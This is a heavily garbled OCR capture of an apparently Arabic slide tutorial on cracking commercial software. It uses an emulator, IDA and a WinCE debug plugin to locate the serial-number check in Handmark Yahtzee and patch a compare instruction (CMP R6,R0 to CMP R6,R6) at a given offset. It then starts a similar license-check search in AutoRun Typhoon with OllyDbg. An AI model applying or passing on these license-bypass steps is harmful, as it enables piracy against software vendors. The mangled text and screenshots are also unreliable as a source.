Smartphone 2003 SE QYGA Emulator 

Others 


¿Pocket Pc 2003 SE Emulator ¿225 6d óve e 
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Not connected 


Hide Details 2 


Information Type Status 


File -> Connection Settings 


all Bu ls ud de Ado ¡pit (405) 
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ES 


Connection Settings 


co Maiting for deyice to connect 
S Conmect... 


w Show status icon in taskbar 
Y Allow USB connections 
Y Allow connections to one of the following: 
E 
This computer is connected 
Automatic 


Y Open ActiveSync when my device connects 


Allow wireless connection on device when connected to the desktop 


New Partnership 


Set Up a Partnership 


This wizard helps pou establish a partnership between your 
mobile device and this computer. You can set up either a 
standard partnership to synchronize data between your 
device and this computer, or a guest partnership to simply 
transfer data between your device and this computer. 


Wehat kind of partnership would you like to establish between 
pour device and this computer? 


(O) Standard partnership 
| want to synchronize data between my device and 
this computer, keeping data such as e-mail and 
calendar items up-to-date in both places. 


¡OE Ip 
| want to only copy and move information between my 
device and this computer, add and remove programs, 
or restore a backup image on a device whose memory 
has been reset. | do not want to synchronize data. 


: Guest ¿eo 
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Microsoft ActiveSync 


Eile View Tools Help 


O L [ar Explore 


Connected 


Hide Details 2 


Information Type 


110) Eds 
[Start ee Y] d% 4:46 
Wednesday, July 09, 2008 

Tap here to set owner information 


No unread 


No upcoming appointments 
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- Microsoft ActiveSync 3 y ch imss Explore ¿PE 
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verutónoya Je ¿a Debugger Remote. 


ad Us 


. Windows Mobile pagues de ido y, Jaja 


New Project 


Project types: Templates: 


windows Visual Studio installed templates 
» Smart Device 
Database 3) Custom Wizard EA Windows Forms Application 


Starter Kits EACLR Console Application BA win32 Console Application 
Y Other Languages [a aTL Project elgmiFC Application 
» Visual Basic Makefile Project $5.ASP.NET Web Service 
Visual J% [JaTL Server Project ¿E> ATL Server Web Service 
GAJaTL Smart Device Project ¿A dlass Library 
ATL FX CLR Empty Project FEmpty Project 
Pd BU2 MFC ActiveX Control BÉ MEC DLL 


General SgmeC Smart Device ActiveX Control FÉMFC Smart Device Application 


MFE ] a MFC Smart Device DLL AA SQL Server Project 
Smart Device = = 


Win32 [3] Win32 Project Ez Win32 Smart Device Project 


¿Windows Forms Control Library dl Windows Service 


» - Other Project Types = 


v 


A Win32 or Console project for Windows Mobile and other Windows CE-based devices 


Location: | cl Ñ DA ¡Desktop v |] 


Solution: [Create new Solution v | [Y] Create directory For solution 


Solution Name: catena_man 


Cancel 


Ok -> Next -> 


8 ay 0 zado Upa 408 
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Win32 Smart Device Project Wizard - catena_man 


Platforms 


Overview Select platform SDKs to be added to the current project. 


Platforms Installed SDKs: Selected SDKs: 
Application Settings 


loaoeloz 


Pocket PC 2003 
Instruction sets: ARMY4 


l < Previous ! ( Next > ] ( Finish 


] [ Cancel 


Next -> 


Win32 Smart Device Project Wizard - catena_man 


E 
| 


.. - = | 
ES 


Overview Application type: Add support for: 
Platforms (O Windows application Part 


Project Settings 


Application Settimas E mec 
) DLL 


(O) Static library 
Additional options: 
E Empty project 


< Previous 


Finish. 


Build -> Build Solution +3 Console Smart Device /. 
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BuildLog.htm 
HTML Document an [| catena_man,exe 
8 KB 


catena_man,obj 


catena_man.pch 
Precompiled Header File 
3,904 KB 


Object File 
2 KB 


me 
1] 
catena_man.pdb $ stdafx,obj 
Program Debug Database Object File 
443 KB 91 KB 


vc8D.idb 
YC++ Minimum Rebuild Depen 
283 KB 


vc80.pdb 
Program Debug Database 
356 KB 


. DuckHunt yas*z Debugger Ee* J2gágó yá 
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Loa la de, ON NO boss a 
q ja ij fan ¿o jo pj tajo ye 2 Emulator . 


ds Microsoft ActiveSync4516 jas za da 009 ó s dey sa zuá 2, Remote Debugger dj 
4 ' iv : ¿Explore y), ed abítyalo Las 33 ¿Ada el JUGA : 


A AN 
eneral Ñ [7 Explore 


re are no usable controls in this group, Drag 


item onto this text to add ¡t to the toolbox., aaa 


File Edit View Favorites Tools Help 
en A >) D . Search || 7 Folders * mr [Y 


Address ( Program Files|Ce4arabliDuck_Hunt 
Folder Tasks - UN 


==] Rename this item 


Ly Move this item 


Duck Hunt,exe 


all Bu ls ud de Ado ¡pit (410) 
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Li 2á dy 4 catena_man (a) 


155 ES Program Files|Ce4arabliDuck_Hunt v |] % Go 


3 Cedarab Duck Hunt.exe catena_man.exe 


=* "Desktoplcatena_manicatena_maniPocket PC 2003 (ARMY4)|Debug 


y BuildLog.htm 
HTML Document catena_man.exe 
8 KB 


catena_man.obj catena_man.pch 
Object File Precompiled Header File 
2 KB 3,904 KB 


catena_man.pdb stdafx.obj 
Program Debug Database Object File 
443 KB 91 KB 


vc80.idb vc80.pdb 
YC++ Minimum Rebuild Depen. .. Program Debug Database 
283 KB 356 KB 


Search | 7 Folders * mv [y 


MDesktopicatena_manicatena_maniPocket PC 2003 


pa catena_man.exe 
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ai J 06 Y 40 ¿lá ya ge éd Debug 9900 Adsl 


1YLo: k 


O 
¿les y catena_man 


vz ado vue E Emulator 


o) 


: Microsoft Visual Studio 2005 y > 


Cod Solution 'catena_man' (1 project) 


E 


Y | Header 


DUIQUr OLI | ALLY SLU 


» - Common Properties 


en J EII 


11] stda 


PA Daermre 
Unload Project 


Properties | 


| LISA ULINSL A LS AT 


Ad J l CI GI LI OIE ss 


Debugger to launch: 


Configuration Properties 


Smart Device Native Debugger 


General 
Deployment 
» CIC++ 
» - Linker 
»--2ML Document Generator 


.,r 


A 


Remote Executable 
Command Arguments 


» Common Properties 
Configuration Properties 
General 
Debugging 
p-CIC++ 
» - Linker 
» XML Document Generator 


ho Demmura Tarrasa biarm 


a ay ul dao lll 


Program Files Ce4arab'Duck_Hunt' catena_man, 


Program FilesiCe4arablDuck_Huntlcatena_man.exe: 32 


E General 
Deployment Device 
Additional Files 

Remote Directory 

E Server Side Actions 
Register Output 


Pocket PC 2003 SE Emulator 


Program Files¡Ce4arabiDuck_Hunt 


No 


. Deployment Vliyizi partida, 


: Configuration Manager ¿> YÍ. CEA 


loas lug as au los ASE: ATARE besa? loz sl laico dUre 


Configuration Manager 


Active solution configuration: Active solution platform: 
Debug y | [Pocket PC 2003 (ARMY4) y| 


Project contexts (check the project configurations to build or deploy): 


Project Configuration Platform Build Deploy 


catena_man Debug w PocketPC 2003... y A 


File Edit View Project Build Debug Tools Window Community Help 
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> a 9 (3% Hex [9 + 7 Pocket PC 2003 SE Emulator - 0 A La o, [mun] 2853 = 
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¿tujaliigaral eS galo exe ¿ayas olga ey tua zo Debugger 


ata 33 7d ¿9 Debug pra dos Jl pu TY Ll, 


Remote JÓ jay ¿do Alas jo 
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carr o aa Emulator or Ól as: 


Micrra<oft Vienal Stidin2005 a. Emilatar.c> 
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sil ita ie sata gos O 


Ha a 
99 gan, a 
¡5 állelos 922 Emulator ¿o je óz- pe Pocket O A 


Jácdo AL 20, Lom ya ye eos EV) e Debugger o Sul? 
q as. 


IDA! 


Gí yasz (WinCE Plugin For IDA ' 


o) 
wince_remote_arm.dll yida_kdstub.dIl ¿aL a) 2 € —S 
1923 andas IDA 55) 
250 Lálwince_stub.plw3L 25476231 ¿2 Plugins d 

grs Plugins ¿bgsg3 q ¿énIDA 
a tcdas ay HandmarkYathzee1.05  ! 


: Handmark Yathzee 1.05 gas: Debugger Ea? J2gágó vá 
y pla ds Ba ¿die jaja e 20 Emulator 


Explore 2» YÍY 352 Microsoft ActiveSync 4.5 Ízóia Emulator => 53) as algara EXE 
390) pd alo y id ji: 


- L=- L_— * 
(A) Program FilesiHandmark|YAHTZEE 
Ó O | 
ma] Dl 
fmodce. dll gx.dil Yahtzee.exe Yahtzee,tod 


landmark 


Ae Miacumente 


¿sli joy 00d lija as AÑEIDA ads ¿data de zoo il: 
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Load file C:*Documents and Settingstahmad'Desktop+Yahtzee.exe as 
Portable executable for ARM (PE) [pe.Idw] 
S es 


-UU5 executable 
Binary file 


Processor type 
Intel 80x86 processors: metapc v 


Analysis 
Loading segment RUULDUDUUL Jl Enabled 


Loading offset J*Ñ0000000C Y Indicator enabled 


Options 


Sim tema. — 

Rename DLL entries 

Manual load | 

Fill segment gap 

Y| Make imports segment | 
Create FLAT group 


« 


Kemel options2 | 


Processor options 


¿ok Yiz 
Information 


] ) ARM AND THUMB MODE SWITCH INSTRUCTIONS 


This processor has two instruction encodings: 4RM and THUMB. 
IDA allows to specify the encoding mode for every sinale instruction. 
For this IDA uses a virtual register T. Ifits value is zero, then 

the ARM mode ¡is used, otherwise the THUMB mode is used. 

You can change the value of the register T using 

the 'change segment register value' command 

(the canonical hotkey ¡is Alt-G) 


Don't display this message again 


ok YÍ.E 


all Bu A val de Ado ¡pat (a15) 


lie lees yz les ago: ATARE bé $ Sd ¡de 1 


lille 


IDA - C:¡Documents and Settings", Desktop'1 
"| AAA 1 Te +] a = asnD',2= 
a 4 'VHAAS7AO DEN. aT | MESS El 


An A NX YE He SS MK 
ES SER FAR 


0 
¡E ui A A 


Strings KÁ Structures Ten Enums| 


IDA View-A Names window 
Name 

F nullsub_6 
nullsub_7 
nullsub_8 
nullsub_9 
nullsub_10 
nulisub 1 


[ 4 


SP?, <Ra4,R5,LR) S 
RA, RO Line 1 of 800 


RO, 110x230 Strings window 
R5, R3 


__2 WAPAXI_2Z 5 operator new(uint) Address Lenath 
RO, $10 .*.data:DO... 00000024 
loc_23088 0 .data:DO... OOODO01A 
.data:D0.... 00000012 

.data:DO.... 00000016 

[100 %.s deta:00... O0DDOO1E 


A NS 
loc_23088 OS 


R1, RA 


100.00%o (252,-41) (104,12) DOD1305C_ 00023C5C; WinMain 


compiling file 'C:xProgram FilesxIDAMidciida.idc'... 
Executing function 'main'... 

compiling file 'C:xProgram FilesxIDAMidcionload.idc'... 
Executing function 'OnLoad'... 

IDA is analysing the input file... 

You may start to explore the input file right now. 
Using FLIRT signature: Windows CE runtime £: MFC for ARM 
Propagating type information... 

Function argument inf i i 
The initial auto 


rra 


4 


AU: idle Down Disk; 9GB 


OK Debugger ->Start process 


* 


SS) 0A472 Emulator y a2tió, 


Debugger warning 


“You are going to launch the debugger. 
Debugging a program means that ¡ts code will be executed on your system. 
Be careful with malicious programs, viruses and trojans! 


REMAFK: if you select 'No", the debugger will be automatically disabled. 


Are you sure you want to continue? 


Don't display this message again 


all Bu ls ud de Ado ¡pit (416) 


loba lo dz IES VAGA: ATARE bis? luz ll ie dOt 


Please confirm 


y ) The remote file C:1Documents and Settingsahmad+DesktopYahtzee.exe could not be found. 


Do you want IDA, to copy the executable to the remote computer? 


Yes No 


Dj lt Sal! 


SADA Ligar ENE sjisdé E 00d ¿2 Emulator: di 
Warning 


A Failed to launch Y ahtzee.exe: The specified module could not be found. 


id ja! 


po pra grita jaa 


Y => L— L— - 


xddress | ¡Program FilesiHandmark|YAHTZEE 
Ó os 
O 


(E) Handmark fmodce. dll gx.dil Yahtzee.exe Yahtzee,tod 


HE). Mu Miaruimante 


A SE ES Gsdon, 


EXE 292000 pad3bis a jgosjbálisly jay 00d UYIDA A Ógorals 
EQOzo 


all Bu ls ud de Ado ¡pat (417) 


loba lag oz IES VASC: ATARE bis? luz ll ie dot 


My Windows Mobile-Based Device 
File Edit View Favorites Tools Help 


(ETS (3 Search || > Folders e ZZv | y 


Address | B 


r| > 


ca 2) JD 0 6 


B Mobile Device Databases “to CSIDL_WINDO... 


Application Data My Documents 
[E) My Documents 


E Shared Documents 


Y My Network Places (a 10) 10) 


profiles Program Files Temp Windows Yahtzee,exe 


¿ito Ni gala Alli yo Go CU) CU (0) an 
E EE MO Q | 


so 
vhs 


34 $ 344 process Start-> Debugger JJh 3 Y ¿bálas ¿ad ¿aoz 
Please confirm 


P ) The remote file C:ADocuments and SettingstahmadiDesktopWYahtzee.exe could not be found. 
. 
sy) Do you want IDA, to copy the executable to the remote computer? 


NOS 


Warning 


A The file can't be loaded by the debugger plugin. 


Please verify that the parameters are valid. 


OK 


all Bu ls vall de Ado ¡pit (418) 


lug legs amd luego: ATARE bé $ Sd ¡de 1 olvEdVz 


Debug application setup 


ApplicatiorA *Program FilestHandmarkWYAHTZEEWYahtzee.exe 


IA Program FilestHandmarkY4HTZEENYahtzee.exe 


Directory fkProgram FilestHandmarkYYAHTZEE 

Parameters 

Hostname v| Port [23946 y | 
_ a E 


IDA - C:¡Documents and Settings ahmad'DesktopYahtzee.exe - Running 


E== Yahize£ 


/ Password 


E Pay Game 
+ High Scores 


YD Help 


O apant— 


vdd y qa al! 


A yl gata Debugger Remote Sub zepóloda 1JJY : Q 


all Bu ls ud de Ado Ibpit (a19) 


las leg as dz Ives sz: ATARE bis Dd ¡du 1 alvedOz 
File Edit Jump Search View  Debugger Options “Windows Help 
so E 


“3 4 [4] 
Á En 


0101 0101 To n_n, 
COD DAT 


aso IRA 


dh + General registers 


F9 
Attach to process... 
[ y | rOCess 


ess options... 


> Start process 


" SM 


N Names 
Ayad ¿sd good jar zo 


IDAS Sl osa 05 todito, 


. 


CN AA e] A e A 
006 ¿boi ás Ja y cAX al tuya 17 22 Emulator eo tuya a: 
Start -> Program -> games -> Yathzee 


Laso O Pa 
yyabo? ) esp 36JÓ 937 Opos 


a 
ya: 


A INS 


lug legs amd luego: ATARE bé $ Sd ¡de 1 lez 


A Pocket PC 2003 Second Edition 


Yahtzee Ha “il *(í 8:32 


Invalid Serial Number 


If you have problems with your 
serial number, visit the Handmark 
web site at www,handmark.com 
for support. 


Serial 4: [catena_man 


shift] z[x[c[v|binim|,[.[7. 
cufát] [fx] [w[r[e[>| 


E aya 


jhartuya IDA Ub? 3% Ó Debugger 


MicrosoftActiveSync4.5,7 235Emulator-¿4ÍóL SEA) Q : 
pa Eraya == 


: Strings Windows Yi yu y 


all Bu ls ud de Ado ¡pit (421) 


lid leas aioz les UAgz: ATARE Li dde 1 wild. 


'E hPreuvInstaá 


1c_23C88 


A IIS 


".* data:D0... ODODOODE 
".* data:D0... 00000024 
".* data:00... 00000022 
".* data:00.... ODO0DO2C 


F nulisub_10 
F nube 1 po 
4 


<> » 


Lenath 

00000024 
00000014, 
00000012 
00000016 


Address 
...!! data:DO... 
...!! data:D0... 


...!" data:DO... 
...!! data:D0... 
'." data:00... 0000001E 


A AS uni 
4 | <> | 


:)if Lajya IDA: vip ayi po jápgas 3 YA jo 
($2 

A 

000456 

Debug Information 

Debug turned off 

Invalid Serial Number 

If you have problems with your serial number, visit the Handmark web site at ... 


* .data:00037ED0 alnvalidSerialN unicode ali eria ' g 


«data: 00037EDB 


. 


a ay ll ao lll 


5 DATA XREF: sub_30E64:0ff_31264To 
* .data:00937EFC alfYouHaveProbl unicode [0, <If you have problems with your será p E 

:ontrol flow : 9003 7EFC 
«data: 00037EFC 
«data: 00037EFC 


unicode 
unicode 


AA E A 


luis legs amd luego: ATARE bé $ Sd ¡de 1 lez 


8003125C ; 


00031260 ; LPCUSTR off_31260 


600312606 o0ff_312608 
00031260 


DCD 


60031264 ; LPCUSTR off_31264 


alfYouHaveProbl 5 DATA XREF: sub_30E64+3E8 
5 "If you have problems wi 


60031264 0ff_31264 DCD alInvalidSerialN 5 DATA XREF: sub_308E64:10c 
00031264 5 "Invalid Serial Number” 

00031268 ; 

00031268 

00031268 loc_31268 5 CODE XREF: sub_30E64+381 
00031268 HOU R2, H0xC 5 size _t 

98003126C HOU R1, $40 5 int 

00031270 ADD RO, SP, 1t0x178+pshidi ; void * 

00031274 BL memset 

00031278 HOU R3, 41 

9003127C STR R4, [SP,10x178+pshidi.hD1g] 


py A 
—_—_—_ EA 


HessageBoxu 
1loc_312E4 


*— 


1658 00031258: sub_30E64+3F4 


A td eS 
erat y 30) pe zas 


: 
; 


Easil 7d dssó 59), ¡yal md Y 


a ay ud ao lll 


,> 


eo cÍ? ÁY Jos zo y Jl k* ¿daYya) E Lo VeiwGraph: 


; size _t 


HOU R1, +0 5 int 

ADD RO, SP, $0x178+pshidi ; void * 
BL memset 

HOU R3, 441 

STR Ra», [SP,1t0x178+pshidi.hD1g] 
STR R3, [SP,tt0x178+pshidi] 

HOU R3, HA 

HOU RO, 41 5 DWORD 

STR R3, [SP,0x178+pshidi .dwFlags] 
BL SipShowIhH 

OU RO, RA 5 hind 

BL SetForegroundWindow 

ADD RO, SP, $0x178+pshidi ; pshidi 


abogos, 


O: PS A E Do 
076 poe (e 
le 


3 
Japtas e dab tuya: 


loa lee as ama lUESLASE: ATARE bis az luzel wet 


From: 
HOU 


loc_31258 
MOU r3, 10 ADD 
MOU ro, Ry ADD 
BL hHessagt 
-LDR 
B 1oc_312 pp 
BL 
MOU 
MOUS 
ADD 
MOUNE 
BL 
ANDS 
MOUNE 
LDRNE 
LDRNE 
J658 00031258: sub_30ESTRNEB 
DAidciida.idc'... BNE 


DAiidcionload.idc'... 


E AS OTAN E 


F Edit Function... Al-+P 
EBpho 
Hide Num - 
HOUI 
CHP Text view 
BNE X Undefine Ú 
Synchronize with » 


IFBO: sub_30E64+1 Run to cursor 


mn Add breakpoint 


¿4 Add write trace 


¡dc ... 


ad.idc'... 


y alias 


A INS 


sub_30E64+374 


R2, H6 
R1, SP, 0x178+uar_148 
RO, SP, 1t0x178+1pString 
Cstring__Left 
R1, =a000456 
RO, [Ra] 
wcscmp 

R5, 4H 

R3, RO 

RO, SP, 0x178+uar_148 

R5, H0 

_ 1CString_ QAA_X2 ; CString: 
R3, R5, HOXFF 

RO, +0 

R2, =aDebuginforma_2 

R1, =aDebugTurnedOff 

RO, [R7] 

10c_31258 


wchar_t x 
wchar_t x 


E A 1 
“CString(void) > 


psh: 


EN Espagols: 


R2, =afAboutRegistrat 


=aHandmarkRegist 
219—A 


- E 


tre jagalljos jue gus Process Start -> Debugger : 


loba le dz IES VASC: ATARE big? luz ll ie dOt 


Debug application setup 


ApplicatiorA *Program FilestHandmarkiYAHTZEENYahtzee.exe 


»] 
Input file v | 
Directory f4Program FilestHandmarkYY4HTZEE v | 
Parameters y | 


IDA - C:¡Documents and Settings' ahmad'Desktop' Yahtzee.exe 


Yahtzee ee Y] e 9:07 O 

To continue using this product you 

must enter a valid serial number, 

Vist www,handango.com to 

purchase a product serial number or 

enter the serial number available on 

your product registration card. 

Serial 4: [catena_man 

a d 

ml lolalalsisl718lolol 13] 


IDA View-PC IDA View-SP = General registers = 


00030F94 ADD RO, SP, 110x178+1pText * 2605EF 14 BOBB000Al 
89939F98 BL _1cString__0AA_XZ ; CString: 2605EF18 
2605EF1C D000090A 
2605EF20 0000001A 
2605EF 24 TE 


B09398F9C loc_30F9C E MERdÓ 
B0039F9C HOUL 


TM ERAS SI 


Threads [3 Da viewec ] IDA View-SP| 


AU: idle Down Disk: 9GB 


990309FA4 CMP 2605EF34 


2605EF38 
2605EF3C 
2605EF40 
2605EF44 
2605EF48 
2605EF4C 
2605EF50 
00039FB4 HMOUL R3, 0x7DC 2605EF54 
B0030FBC CHP Ró6, R3 2605EF58 
09030FC8 BNE loc_31140 2605EF5C 
2605EF60 s 

2605EF64 89031028 L, sub_31B24+104 


«| ] PC 00030FB8 L, sub_30E64+140 
10,00% — (1116,1652) (377,272) | 00020380 | O0030FBD: sub_30E64+14 UNKNOWN | 2605EF28; debug? Pon 28888818 


9003 SñAS PRREN 


A INS 


lag lee as ame lUESVASZ: ATARE bos az luzsl wood 


00030FCO 


ebuginforma_2 
ebugTurnedOff 


58 


00031190 000311D8 


000311DC LDR =unk_385DC 
900311E8 LDR [Re] 
000311E4 ChHP RO 


000311EC LDR 
000311F0 LDR 
000311F4 ChHP 


000311F8 BLT 


A INS 


RO, =unk_385D8 
ro, [RO] 

R6, RO 
loc_31248 


lvl log tas ie lle ag: ATARE 07 sat les 1 lie dot 


General registers 


0%4A5 O9ED 
00000000 
EDC51333 
900000000 
002DA790 
00090000 
2FFDE6A4 
800385E4 L, .data:unk_385E4 
99000111 
90900901 
902DA848 
2605F1EC L, debug753:2605F1EC 
EDC51333 
2605F034 L, debug753:2605F 034 
03F86028 L, cored11.d11:03F86028 
000311E8 L, sub_30E64+384 

PSA 60009810 


eta: Zim ¿ca js distólo) ¿ueggo 50 
000311F8 00031204 


dp dci, ¿od hy A 


pag jas A: 


O* 2d Co) 


[Yahtzee Pf Sal dí 9:37 


This fully functional demo of 
Yahtzee allows you to play S more 
games. 


Thank you for purchasing Yahtzee! 


Enter Serial + | Try the Demo 


8 ay ul dao lll 


2 Gaya 


lada lo dz IES VASC: ATARE bis? luz sl lie dot 


abia yd jad Crack ahaál ¿zo 


«Arm Edit Disassembler 


Ao aj yy ón: 
000311E9 LDR ro, [Re] 
000311E4 CHP R6, RO 


B00311EC LDR 
900311F68 LDR RA, 
9090311F4 ChHP 
B00311F8 BLT 


=unk_385D8 
[re] 
RO 

_31258 


O 
C- 
ds 
«[ 


cmpR6,RO— 000056E1 Cmp R6,R6 06 00 56 El 


E: Íy Eta a as IJJV SIDA SO: elos : 
A — AAA A A A A A A E AN 
B00311DC LDR RO, =unk_385DC 


000311E0 LDR RO, [RO] 
000311E4 CHP Ró6, RO 


990311EC LDR M 
990311F8 LDR ro, [RO] 
990311F4 CHP R6, RO 


ARONAATO ni vr A NANI 


w 000205E4 000311€E4: sub_30E64+380 


ES 


: arm_edit_Disassembler SÍó 


all Bu ls ud de Ado ¡pit (428) 


lid leas aioz les UAgz: ATARE Li dde 1] lvl 


File > open > jump > to Offset a ¿0 uz ¿gods 


00900024 00900000 
00000028 00900000 
90000082C 00900000 
00000030 00000000 
00000034 00000000 
00000038 00000000 
00000083C E0000000 
00000040 BE1FBADBE 
00000044 90B489CD 
00000048 21B8014C 


ARMED - ARM Editor 


AANAITN 


000205E4 
1002505É8 
800285EC 
000205F0 
900205F4 
800285F8 
800285FC 
0800206008 
80020604 
800206 08 
000206 08C 
9009206108 


Offset : 
OpCode : 


Hex Code:  OBDOS56E1 


EXE po a A 


Disassembler IDE - €C:Docum 


¿ZO DMT 


Jump to... 


Address | 132580 


+ Decima 
Hex 


Cancel 


000205E 4 
CMP R6,R6 


Cancel 


File > save £u OK 


Emulator + Gdrtuya ¿opa alzas 


pEÓ co 


Juas cy Fun2Link 


/ h: 
>, > 


e o? 


8 ay ol dao lll 


loa log tas ie lle ag: ATARE 07 sat les 1 lie dot 


sa LE | 


a30:Pe 


BE TAAS/7aÓ DEN 
Bon AR A RA NX YE eS MK AA 


ER A 


Graph overview 


SP*, ¿RA,LR) 
SP, SP, 80x10 
R1, R3 

Rá, RO 
sub_1FF89 
R3, RO 

RO, 10 
loc_1FF14 


100.00% (-147,-41) (236,11) 0000F298 DOD1FE98: WinMain 


ser Jus (me 
A ñR A 


5 us 


Name 

IpValueName 

IpSubKey 

IpDialogFunc 

IpString 

IpFormat 

CDialonTemalate-"CDialnnT amnlately 7 
o » 


Length 
ES 
)... 00000044 
. DODOOO22 
).. 00000020 
.. DODOOO26 

O nan2n 


Compiling file 'C:NProgram FileskIDAMidcWida.idc' 
Executing function 'main' 

Ccompiling file 'c: Nerogram” Filesxinavidcionload. idc' 
Executing function 'OnLoad' 

IDA is analysing the input File 

You may start to explore the input file right now. 
Using FLIRT signature: Windows CE runtime 4 MFC for ARM 
Propagating type informatio, 


propagate: 
n finished. 


¿IV ¿Functions 3 


¡2 HegLreater. eye xw 
7 
£) memset 


pAgzeo Joápipilo 


Text UUUZIA 14 
text 00021420 


VULULULUS Hi 
00000008 R 


mes 


LJ ros 


mes 


compiling file 'c: Program File 


Executing function 'main'... 


compiling file 'c: Program File 
Executing function 'OnLoad'... 
IDA is analysing the input file 
You may start to explore the ir 
Using FLIRT signature: Windows 


A TIN 


O AE 


Delete functionís)... Del 
Ctri+E 
Ctri4+U 


Edit Function... 
Refresh 


EM ado br 
B' Enable breakpoints 


BR Diecahla hrasbnninte 


Oiga y jasa 5 Jin jua Messageboxw: 


lia la omo les Lag: ATARE besa? loz el drluE dot 


RO 002C49E8 

AI 0800824E18 L, _data:alnvalidRegis! 
R2 B80024E54 L, .data:aError 

R3 000000009 

R4 00054218 L, .data:unk_54218 

R5 002C49E8 

R6 4D983482 

A7 00024E18 L, _data:alnvalidRegis! 
Ra B0024E54 Ll, .data:aError 


a IA Ag 1016DD94 L, debug588:1016DD94 
99921420 ; int _ stdcall MessageBoxW(HWND ht A10 80247918 L, debug801:80247910 
00021A2C HessageBoxt A11 800800001 
0002130 LDR PC, [R12] PP FRFFE 
906021430 ; End of function HMessageBoxW SP 2619FCAC L, debug716:2619FC4C 


III ¿boGóLR E ras galera soe messageboxW !! 


¿aho ) ados d q Esla SES? ex 9 J9004 ¿Uiroya aya: 
B0081156C MO0U R2, R5 5 hindParent 
AR a 


5 30 


515 1 HA : 3 OÍ O 
90911574 BL DialogBoxIndirectParamt 
515 y b 


$ y E 
8001157C LDR 
SII: : MP 
00011584 BEQ 


RO, HO 
loc _115BC 


99911588 LDR R1, =unk_54888 
e Mi 99911580 LDR RO, =aZfpk 
DyeaR0z 0 99011598 BL sub_11860 


00911594 HO0US R3, RO 


da al e a 


or ¿Cancel 


A A A A 


4 y 3d jraja 


ts 


all Bu ls ud de Ado ¡pat (a31) 


E 


leg lle tas om lug: ATARE AA dd las due dust 


AnteKun Ti Yphoon FPro v4.0, Le A) 


OllyDbg Y 5 
. ATARE FastScanner v2.0 O “$ 
.Exelnfo PEV0.0.1.9 Y — 


deve lia (gua a qa ¿oda ) [£ 2) 


A II ; 
Mili ao A ptas 
e CA , 
EAS ES da Gs E 


gr Joso ¿jó 


OS 


Ya KANAL 12.90 


D:Program Files|A4utoRun Typhoon 4 4utoRun * 


 ADLER32 :: VODASBSC :: DO04ABBSC 

- ADLER32 :; CODASC31 5: 00448C31 

CRO32 :: DOOC8S9FC :: 004C089FC 

MDS :: 000278FF :: 004278FF 

H- ZLIB deflate [word] :: O0OCB440 :; 0O04CB440 
E-£Big number) :: OOOF1310:: 004F1310 
E-£Big number) :: ODOF1394 :: 004F1394 


5] 


Section 


About Export... Close 


Ml Adler32 checksum (unsigned 32-bit integer, BASE 
value); used by ZLIB compression library 


st Bytes 


se Of Data 


all ly 0d cado lll 2009 


lia legs add les ao: ATARE us $ dd 40) ST EZ E LA 


G Welcome to AutoRun Typhoon 4 


== 


o) Create a New Project 


o k Load an Existing Project 


UE dadas jrzeiós ¿ici japo lo: 


ú AutoRun Typhoon 4 - 'Trial Version! 


Project Registration Info e 


Serial Number ... 
Purchase AutoRun Typhoon 


az Widunlock 


GIO IR 99 


AutoRun Typhoon - Serial Humber 


Name Prince 


Serial Number 1123456789 


You are currently licensed to the Free Trial of AutoRun | Reset | 


Invalid Serial Number 4 


Your Serial Number is either invalid or out of date, Make sure 
you enter your Name and Serial Number exactly as shown in 
your registration email (try cutting and pasting to avoid 
errors). If you are using a Serial Number from an older 


version of AutoRun you can visit this page to upgrade your 
license or locate your new Serial Number (if you are elligible 
for the free upgrade). 


a ly el dao lll 2009 


las leg as yz Ives oasz: ATARE 07 ¿6 dd co ¿6 E 8 dd EST EA 


asis 35 Number Serial Invalid 
: OllyDbg Gz2 yo jas 


Td a A A 

ASCII "HESSAGE LAUNCH-EXISTING_MENU” 

ASCII "TYPH_EDIT_INT_LIMK” 

ASCII "SET MODIFIED THE FLAG” 

ASCII "Shell_Traylind” 

ASCII "You are currently licen >Free Trial</B> o 
ASCII ere Serial Number<-B>",CR,PF,CR,LF,"Your Seria 
ASCII "You are currently licensed to t <B>Personal Version 
ASCII "You are currently licensed to ie <B>Professional Ver 
ASCII "You are currently licensed toJthe <B>Free Version<B> 
ASCII "SOFTWAREsTyphoon Software” 

ASCII "SOFTWARES Typhoon Software” 

ASCII "SOFTWARESTyphoon Software”, ) 

ASCII "You are currently licens to the <B>Free Trial<B> a 
ASCII "<B>Invalid Serial Numbert-B>",CR,LF,CR+LF, "Your Seria 


, , a A A o) :4 PC 
1 AA ERES $50) 3 30 das cl y 7 sl 


E 


EH Ta PTR SS: [ESP+20],ESP 
24 30 0000004 MOU DWORD PTR SS: [ESP+30],0 


101%] 


_¿FFEFFF HOU DWORD PTA SS: LESP+20J, 1 Jus ja dial! la Un 


ADD ESP, aC 

LEA ECX,DIORD PTR SS: [ESP+C] 
MOU DWORD_PTR DS: [ESI+6614],EAXx 
PUSH 004FSECO 


B MOU EAX, DWORD PTR DS: [ESI+6614] 
o 6100004 MOU_DWORD_PTR SS: [ESP+20], 1 


Switch (cases 6,.3) 


MOU EAX, DWORD PTR DS: [EDI] Case A of switch 004245E6 
MOU_ECX, oo PTR DS: [EAX-8] 
TEST ECX,ECX 


MOU ECX, DWORD PTR DS: [EBXJ 
MOV _EAX, e PTR DS: [ECX-8] 
EST _EAK 


MOU EDX, DWORD PTR DS: [ESI+6618] 


m 
un 
pudo] 
m 
D 
xx 
m 
D 
x 


——— 


— 


m 
E 


RutoRun_ .1M04FSBC1 
ASCII "You are currently licensed to the <B 


— > ASCII "<B>Invalid Serial Number</B>”,CR,LF, 


TED 
CH 
MD 
IM L 
ctiom 
SOSoO 
PDA" 
mn 
o_o 
Mad 
NO 
Oh 


mEo 
CEZz 
mr 
Lo 
m 
OID 
DOx 
H 
q3- 
o 
a] 
co 
Ll 


ASCII "You are currently licensed to the <B 


o 
z 
D 
m 
D 
x 
rm 


PUSH _004F0004 ASCII "You are currently licensed to the <B 


aya ¿lali sar op ÓgE JO y a rs gin io sto: ODAL45BC 


288 2/13 090 dado lbs 2009 


las leg as az Ives oasz: ATARE du $ dd co ST =0EZz loci 


D 


AE E 


¡ás pr 9403) 


. 074424 20 FFFFFFFÍMOU DWORD PTR SS: [ESP+2C],-1 
. ES FFOBBO0S CALL _604246C0 

. 8304 BC ADD ESP,BC 

. 8D4C24 ar LEA ECxX. DWORD PTR SS: [ESP+C] 


¿yla da e id 


MOU ECX, DWORD PTR SS: [ESP+20] si 

MOU EDX, DWORD PTR SS: [ESP+5920] sí 

PUSH ECX = 211,0 El 

PUSH EDX [ 1 = sT 
¿Mmbsomp 

ADO ESP, 10 s 

TEST _EAX,EAX FC 


